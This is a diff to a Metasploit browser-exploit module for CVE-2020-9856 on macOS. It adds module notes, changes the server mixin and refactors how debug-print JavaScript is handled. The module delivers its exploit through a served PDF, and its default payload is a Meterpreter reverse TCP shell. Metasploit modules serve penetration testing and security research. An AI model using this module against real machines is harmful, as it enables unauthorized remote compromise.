@@ -7,7 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ManualRanking
 
   include Msf::Post::File
-  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Remote::HttpServer::BrowserExploit
 
   def initialize(info = {})
     super(
@@ -42,6 +42,11 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2020-9856'],
           ['URL', 'https://github.com/sslab-gatech/pwn2own2020'],
         ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Stability' => [CRASH_SAFE]
+        },
         'DefaultTarget' => 0,
         'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
         'Targets' => [
@@ -52,9 +57,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2020-03-18'
       )
     )
-    register_advanced_options([
-      OptBool.new('DEBUG_EXPLOIT', [false, 'Show debug information in the exploit javascript', false]),
-    ])
   end
 
   def exploit_js
@@ -464,12 +466,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-    if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}
-      print_status("[*] #{request.body}")
-      send_response(cli, '')
-      return
-    end
-
     user_agent = request['User-Agent']
     print_status("Request #{request.uri} from #{user_agent}")
     if request.uri.ends_with? '.pdf'
@@ -522,20 +518,7 @@ class MetasploitModule < Msf::Exploit::Remote
       #{exploit_js}
     JS
 
-    if datastore['DEBUG_EXPLOIT']
-      debugjs = %^
-print = function(arg) {
-  var request = new XMLHttpRequest();
-  request.open("POST", "/print", false);
-  request.send("" + arg);
-};
-^
-      jscript = "#{debugjs}#{jscript}"
-    else
-      jscript.gsub!(%r{//.*$}, '') # strip comments
-      jscript.gsub!(/^\s*print\s*\(.*?\);\s*$/, '') # strip print(*);
-    end
-
+    jscript = add_debug_print_js(jscript)
     pdfpath = datastore['URIPATH'] || get_resource
     pdfpath += '/' unless pdfpath.end_with? '/'
     pdfpath += "#{Rex::Text.rand_text_alpha(4..8)}.pdf"
